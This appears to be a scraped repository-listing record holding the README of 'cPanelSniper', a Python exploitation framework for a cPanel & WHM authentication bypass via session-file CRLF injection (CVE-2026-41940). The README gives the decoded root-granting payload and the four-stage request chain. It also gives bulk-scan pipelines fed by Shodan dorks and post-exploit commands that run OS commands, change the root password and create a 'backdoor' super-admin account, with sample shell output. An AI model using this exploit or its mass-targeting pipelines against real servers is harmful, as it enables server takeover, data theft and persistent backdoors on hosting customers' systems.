[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-41":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":16,"stars7d":17,"stars30d":18,"stars90d":15,"forks30d":15,"starsTrendScore":13,"compositeScore":19,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":20,"fork":20,"defaultBranch":21,"hasWiki":22,"hasPages":20,"topics":23,"createdAt":9,"pushedAt":9,"updatedAt":24,"readmeContent":25,"aiSummary":26,"trendingCount":15,"starSnapshotCount":15,"syncStatus":16,"lastSyncTime":27,"discoverSource":28},41,"cPanelSniper","ynsmroztas\u002FcPanelSniper","ynsmroztas","CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection",null,"Python",459,131,6,4,0,2,7,71,6.36,false,"main",true,[],"2026-06-12 02:00:07","# cPanelSniper\n\n\u003Cp align=\"center\">\n \u003Cimg src=\"cPanelSniper.jpg\" alt=\"cPanelSniper\" width=\"700\"\u002F>\n\u003C\u002Fp>\n\n\u003Cp align=\"center\">\n \u003Ca href=\"https:\u002F\u002Fwww.python.org\u002F\">\u003Cimg src=\"https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FPython-3.8%2B-blue?style=flat-square&logo=python\" alt=\"Python\">\u003C\u002Fa>\n \u003Ca href=\"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2026-41940\">\u003Cimg src=\"https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FCVE--2026--41940-CVSS%3A10.0-red?style=flat-square\" alt=\"CVE\">\u003C\u002Fa>\n \u003Cimg src=\"https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FcPanel%20%26%20WHM-Auth%20Bypass-critical?style=flat-square&color=red\" alt=\"cPanel\">\n \u003Cimg src=\"https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fstdlib%20only-no%20pip-green?style=flat-square\" alt=\"stdlib\">\n \u003Cimg src=\"https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fpipeline-ready-blue?style=flat-square\" alt=\"pipeline\">\n \u003Ca href=\"https:\u002F\u002Ftwitter.com\u002Fynsmroztas\">\u003Cimg src=\"https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FAuthor-@ynsmroztas-orange?style=flat-square&logo=twitter\" alt=\"Author\">\u003C\u002Fa>\n\u003C\u002Fp>\n\n\u003Cp align=\"center\">\n \u003Cb>CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection\u003C\u002Fb>\u003Cbr>\n 4-stage exploit chain · Interactive WHM Shell · Bulk scanner · Pipeline ready · stdlib only\n\u003C\u002Fp>\n\n---\n\n## Overview\n\n**cPanelSniper** is a focused exploitation framework for **CVE-2026-41940**, a critical authentication bypass vulnerability affecting cPanel & WHM. The vulnerability allows unauthenticated remote attackers to gain root-level WHM access by injecting CRLF sequences into the session file via the `Authorization` HTTP header — without any valid credentials.\n\n- **CVSS Score:** 10.0 (Critical)\n- **In-the-wild exploitation:** Confirmed (April 2026)\n- **Affected installs:** ~70 million domains running cPanel & WHM\n- **No dependencies:** Pure Python stdlib — no pip, no requests, no external packages\n\n> **For authorized penetration testing and bug bounty programs only.**\n\n---\n\n## How It Works\n\nThe root cause lives in `Session.pm`: the `saveSession()` function calls `filter_sessiondata()` **after** writing the session file to disk. This means CRLF characters embedded in the `Authorization: Basic` header value are written verbatim into the session file, injecting attacker-controlled fields before sanitization occurs.\n\n```\nNormal flow:\n POST \u002Flogin\u002F → filter_sessiondata() → write session → auth check\n\nVulnerable flow:\n POST \u002Flogin\u002F → write session (CRLF payload injected) → filter_sessiondata() → auth check reads poisoned file\n```\n\n### The CRLF Payload\n\nThe `Authorization: Basic` value decodes to:\n\n```\nroot:x\nsuccessful_internal_auth_with_timestamp=9999999999\nuser=root\ntfa_verified=1\nhasroot=1\n```\n\nThese fields are written directly into the session file on disk. When read back, cPanel treats the session as a fully authenticated root session.\n\n### 4-Stage Exploit Chain\n\n```\n┌─────────────────────────────────────────────────────────────┐\n│ Stage 0 — Canonical Hostname Discovery │\n│ GET \u002Fopenid_connect\u002Fcpanelid → 307 → real hostname │\n├─────────────────────────────────────────────────────────────┤\n│ Stage 1 — Mint Preauth Session │\n│ POST \u002Flogin\u002F?login_only=1 (wrong creds) │\n│ ← 401 + whostmgrsession cookie │\n├─────────────────────────────────────────────────────────────┤\n│ Stage 2 — CRLF Injection │\n│ GET \u002F + Cookie: session + Authorization: Basic \u003Cpayload> │\n│ cpsrvd writes CRLF fields into session file │\n│ ← 307 Location: \u002FcpsessXXXXXXXXXX\u002F... │\n├─────────────────────────────────────────────────────────────┤\n│ Stage 3 — Propagate (do_token_denied gadget) │\n│ GET \u002Fscripts2\u002Flistaccts │\n│ Triggers raw→cache flush — injected fields become active │\n│ ← 401 Token denied (expected) │\n├─────────────────────────────────────────────────────────────┤\n│ Stage 4 — Verify WHM Root Access │\n│ GET \u002FcpsessXXXXXXXXXX\u002Fjson-api\u002Fversion │\n│ ← 200 {\"version\":\"11.x.x.x\",\"result\":1} = PWNED │\n└─────────────────────────────────────────────────────────────┘\n```\n\n---\n\n## Affected Versions\n\n| Branch | Vulnerable | Patched |\n|--------|-----------|---------|\n| 110.x | ≤ 11.110.0.96 | **11.110.0.97** |\n| 118.x | ≤ 11.118.0.62 | **11.118.0.63** |\n| 126.x | ≤ 11.126.0.53 | **11.126.0.54** |\n| 132.x | ≤ 11.132.0.28 | **11.132.0.29** |\n| 134.x | ≤ 11.134.0.19 | **11.134.0.20** |\n| 136.x | ≤ 11.136.0.4 | **11.136.0.5** |\n\n---\n\n## Installation\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fynsmroztas\u002FcPanelSniper\ncd cPanelSniper\npython3 cPanelSniper.py --help\n```\n\nNo pip install required. Pure Python 3.8+ stdlib only.\n\n---\n\n## Usage\n\n### Basic Scan\n\n```bash\n# Single target — scan only\npython3 cPanelSniper.py -u https:\u002F\u002Ftarget.com:2087\n\n# Single target — interactive shell after bypass\npython3 cPanelSniper.py -u https:\u002F\u002Ftarget.com:2087 --action shell\n\n# Bulk scan from file\npython3 cPanelSniper.py -l targets.txt -t 20 -o results.json\n\n# Force scan (skip cPanel detection)\npython3 cPanelSniper.py -u https:\u002F\u002Ftarget.com:2087 --force\n```\n\n### Post-Exploit Actions\n\n```bash\n# List all cPanel accounts on the server\npython3 cPanelSniper.py -u https:\u002F\u002Ftarget.com:2087 --action list\n\n# Execute OS command\npython3 cPanelSniper.py -u https:\u002F\u002Ftarget.com:2087 --action cmd --cmd \"id;whoami;uname -a\"\npython3 cPanelSniper.py -u https:\u002F\u002Ftarget.com:2087 --action cmd --cmd \"ls \u002Fhome\"\npython3 cPanelSniper.py -u https:\u002F\u002Ftarget.com:2087 --action cmd --cmd \"cat \u002Fetc\u002Fpasswd\"\n\n# Get server info (hostname, load, disk, MySQL host)\npython3 cPanelSniper.py -u https:\u002F\u002Ftarget.com:2087 --action info\n\n# Get cPanel version\npython3 cPanelSniper.py -u https:\u002F\u002Ftarget.com:2087 --action version\n\n# Change root password\npython3 cPanelSniper.py -u https:\u002F\u002Ftarget.com:2087 --action passwd --passwd 'NewPass@2026!'\n\n# Interactive WHM shell\npython3 cPanelSniper.py -u https:\u002F\u002Ftarget.com:2087 --action shell\n```\n\n### Pipelines\n\n```bash\n# subfinder → httpx → cPanelSniper\nsubfinder -d target.com -silent | \\\n httpx -silent -ports 2087,2086 -threads 50 | \\\n python3 cPanelSniper.py -t 30 -o results.json\n\n# From scope list\ncat scope.txt | \\\n httpx -silent -ports 2087,2086 -threads 100 | \\\n python3 cPanelSniper.py -t 30 -o results.json\n\n# Shodan results\nshodan search --fields ip_str,port 'title:\"WHM Login\"' | \\\n awk '{print \"https:\u002F\u002F\"$1\":\"$2}' | \\\n python3 cPanelSniper.py -t 30 -o shodan_results.json\n\n# stdin pipe\necho \"https:\u002F\u002Ftarget.com:2087\" | python3 cPanelSniper.py\n\n# Multiple sources combined\n{ subfinder -d target.com -silent; cat extra.txt; } | \\\n httpx -silent -ports 2087 | \\\n python3 cPanelSniper.py -t 20 --action list\n```\n\n---\n\n## Interactive WHM Shell\n\nAfter a successful bypass, the `--action shell` flag drops into an interactive prompt:\n\n```\n════════════════════════════════════════════════════════════\n WHM Shell — target.com\n Version: CVE-2026-41940 | Auth: CRLF bypass\n Type 'help' for commands, 'exit' to quit\n════════════════════════════════════════════════════════════\n\nmitsec@target.com ▶ id\n uid=0(root) gid=0(root) groups=0(root)\n\nmitsec@target.com ▶ accounts\n [cPanel Accounts] target.com:2087 (47 users)\n user01 domain: example.com email: admin@example.com\n user02 domain: shop.com email: info@shop.com\n ...\n\nmitsec@target.com ▶ cat \u002Fetc\u002Fpasswd\n root:x:0:0:root:\u002Froot:\u002Fbin\u002Fbash\n daemon:x:1:1:daemon:\u002Fusr\u002Fsbin:\u002Fusr\u002Fsbin\u002Fnologin\n ...\n\nmitsec@target.com ▶ info\n [Server Info] https:\u002F\u002Ftarget.com:2087\n hostname: srv01.target.com\n load: 0.72 \u002F 0.66 \u002F 0.69\n version: 11.130.0.6\n\nmitsec@target.com ▶ addadmin mitsec P@ss2026!\n [BACKDOOR ADMIN CREATED]\n Target : https:\u002F\u002Ftarget.com:2087\n Username : mitsec\n Password : P@ss2026!\n Profile : super_admin\n\nmitsec@target.com ▶ exit\n```\n\n### Shell Commands\n\n| Command | Description |\n|---------|-------------|\n| `id` \u002F `whoami` | Show UID and hostname |\n| `hostname` | Get server hostname |\n| `version` | cPanel version info |\n| `info` | Load, disk, MySQL host, version |\n| `accounts` | List all cPanel user accounts |\n| `cat \u003Cpath>` | Read file content |\n| `ls [path]` | List directory |\n| `exec \u003Ccmd>` | Execute OS command |\n| `addadmin \u003Cuser> \u003Cpass>` | Create backdoor WHM admin |\n| `passwd \u003Cpass>` | Change root password |\n| `api \u003Cendpoint> [k=v ...]` | Raw WHM JSON API call |\n| `help` | Show all commands |\n| `exit` | Exit shell |\n\n---\n\n## CLI Reference\n\n```\nusage: cPanelSniper.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]\n [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]\n [--action ACTION] [--passwd PASS] [--cmd CMD]\n [--new-user USER] [--new-domain DOMAIN]\n [-o OUTPUT] [--no-color]\n\nTarget:\n -u, --url URL Single target URL (e.g. https:\u002F\u002Fhost:2087)\n -l, --list LIST File with URLs (one per line)\n --hostname HOSTNAME Override canonical Host header (auto-discovered)\n\nScan:\n -t, --threads N Concurrent threads (default: 10)\n --timeout N Request timeout seconds (default: 15)\n --rate-limit N Delay between targets (default: 0)\n --force Skip cPanel detection check\n\nPost-Exploit:\n --action ACTION Action: list | passwd | cmd | exec | info |\n version | shell | adduser\n --passwd PASS New root password (--action passwd)\n --cmd CMD OS command (--action cmd\u002Fexec)\n --new-user USER New cPanel username (--action adduser)\n --new-domain DOMAIN New cPanel domain (--action adduser)\n\nOutput:\n -o, --output FILE Save results to JSON file\n --no-color Disable ANSI colors\n```\n\n---\n\n## Shodan Dorks\n\n```\ntitle:\"WHM Login\"\ntitle:\"WebHost Manager\" port:2087\nproduct:\"cPanel\" port:2087\nhttp.title:\"cPanel\" port:2083\nssl.cert.subject.cn:\"cPanel\" port:2087\n```\n\n---\n\n## Output Example\n\n```\n ██████╗██████╗ █████╗ ███╗ ██╗███████╗██╗\n ██╔════╝██╔══██╗██╔══██╗████╗ ██║██╔════╝██║\n ...\n\n CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection\n 4-stage: preauth → CRLF inject → propagate → verify → post-exploit\n In-The-Wild | CVSS 10.0 | By Mitsec (@ynsmroztas)\n\n Configuration:\n Targets : 1\n Threads : 10\n Timeout : 15s\n Action : list\n\n14:46:22 [SCAN] Starting 4-stage exploit chain... https:\u002F\u002Ftarget.com:2087\n14:46:23 [INFO] Canonical hostname discovered: srv01.target.com\n14:46:23 [STEP] Stage 1\u002F4 — Minting preauth session...\n14:46:23 [ OK] Stage1: preauth session = :QFB4o8XENBqlr6U1...\n14:46:23 [STEP] Stage 2\u002F4 — CRLF injection via Authorization header...\n14:46:24 [ OK] Stage2: HTTP 307 → token=\u002Fcpsess8493537756\n14:46:24 [STEP] Stage 3\u002F4 — Firing do_token_denied gadget (raw→cache)...\n14:46:25 [ OK] Stage3: HTTP 401 — do_token_denied gadget fired\n14:46:25 [STEP] Stage 4\u002F4 — Verifying WHM root access...\n14:46:26 [PWND] CVE-2026-41940 CONFIRMED — WHM root access!\n14:46:26 [PWND] Token : \u002Fcpsess8493537756\n14:46:26 [PWND] Version : 11.130.0.6\n14:46:26 [PWND] API URL : https:\u002F\u002Ftarget.com:2087\u002Fcpsess8493537756\u002Fjson-api\u002Fversion\n14:46:26 [ API] Running post-exploit action: list\n14:46:27 [ API] listaccts → HTTP 200\n\n [cPanel Accounts] target.com:2087 (47 accounts)\n client01 domain: client01.com email: admin@client01.com\n client02 domain: client02.net email: info@client02.net\n ...\n\n══════════════════════════════════════════════════════════════════════\n cPanelSniper — Scan Complete\n Time: 5.8s · Targets: 1\n\n ⚡ 1 VULNERABLE TARGET(S)\n\n Target : https:\u002F\u002Ftarget.com:2087\n Version : 11.130.0.6\n Token : \u002Fcpsess8493537756\n API URL : https:\u002F\u002Ftarget.com:2087\u002Fcpsess8493537756\u002Fjson-api\u002Fversion\n══════════════════════════════════════════════════════════════════════\n```\n\n---\n\n## Technical Details\n\n### Session File Injection\n\nThe injected `Authorization: Basic` value (base64-decoded) contains CRLF sequences that become newlines in the cPanel session file:\n\n```\nroot:x\\r\\n\nsuccessful_internal_auth_with_timestamp=9999999999\\r\\n\nuser=root\\r\\n\ntfa_verified=1\\r\\n\nhasroot=1\n```\n\ncPanel's session reader parses these as legitimate session fields, granting full root WHM access.\n\n### Stage 3 — The do_token_denied Gadget\n\nThe critical and often-overlooked step: after the CRLF injection (Stage 2), the poisoned session data exists only in the **raw session file**. A request to `\u002Fscripts2\u002Flistaccts` triggers the internal `do_token_denied` handler, which flushes the raw session data into the session **cache**. Without this flush, Stage 4 would return a 403.\n\n### Session Token Extraction\n\n```\nSet-Cookie: whostmgrsession=%3aSESSION_NAME%2cOB_HEX; ...\n ^ ^\n | +-- ob hash (stripped)\n +-- session name (used for injection)\n```\n\nThe session name (before `%2C`) is extracted and used as the cookie value for subsequent requests.\n\n---\n\n## References\n\n- [watchTowr Labs — CVE-2026-41940 Technical Analysis](https:\u002F\u002Flabs.watchtowr.com\u002Fthe-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940\u002F)\n- [cPanel Security Advisory](https:\u002F\u002Fsupport.cpanel.net\u002Fhc\u002Fen-us\u002Farticles\u002F40073787579671-cPanel-WHM-Security-Update-04-28-2026)\n- [NVD — CVE-2026-41940](https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2026-41940)\n- [Hadrian Blog — CVE-2026-41940 Analysis](https:\u002F\u002Fhadrian.io\u002Fblog\u002Fcve-2026-41940-a-critical-authentication-bypass-in-cpanel)\n- [Nuclei Template — CVE-2026-41940](https:\u002F\u002Fcloud.projectdiscovery.io\u002Flibrary\u002FCVE-2026-41940)\n\n---\n\n## Disclaimer\n\n> This tool is intended for **authorized security testing** and **bug bounty programs only**. Unauthorized access to computer systems is illegal. The author assumes no liability and is not responsible for any misuse or damage caused by this tool. Always obtain proper written authorization before testing.\n\n---\n\n## Author\n\n**Mitsec** — [@ynsmroztas](https:\u002F\u002Ftwitter.com\u002Fynsmroztas)\n\n- 🏆 Top Hacker — Intigriti\n- 🐛 2,430+ vulnerabilities disclosed\n- 💀 1,100+ P1 Critical findings\n- 🏅 100+ Hall of Fame recognitions\n\n---\n\n\u003Cp align=\"center\">\n Made with ❤️ by \u003Ca href=\"https:\u002F\u002Ftwitter.com\u002Fynsmroztas\">@ynsmroztas\u003C\u002Fa>\n\u003C\u002Fp>\n","cPanelSniper 是一个针对 CVE-2026-41940 漏洞的利用框架,该漏洞允许攻击者通过在会话文件中注入 CRLF 序列绕过 cPanel & WHM 的身份验证。其核心功能包括四阶段的漏洞利用链、交互式的 WHM Shell 以及批量扫描器,完全基于 Python 标准库开发,无需额外依赖。适用于授权的安全测试和漏洞赏金计划,在实际环境中已确认存在此漏洞影响约7000万个运行 cPanel & WHM 的域名。","2026-06-11 02:30:36","CREATED_QUERY"]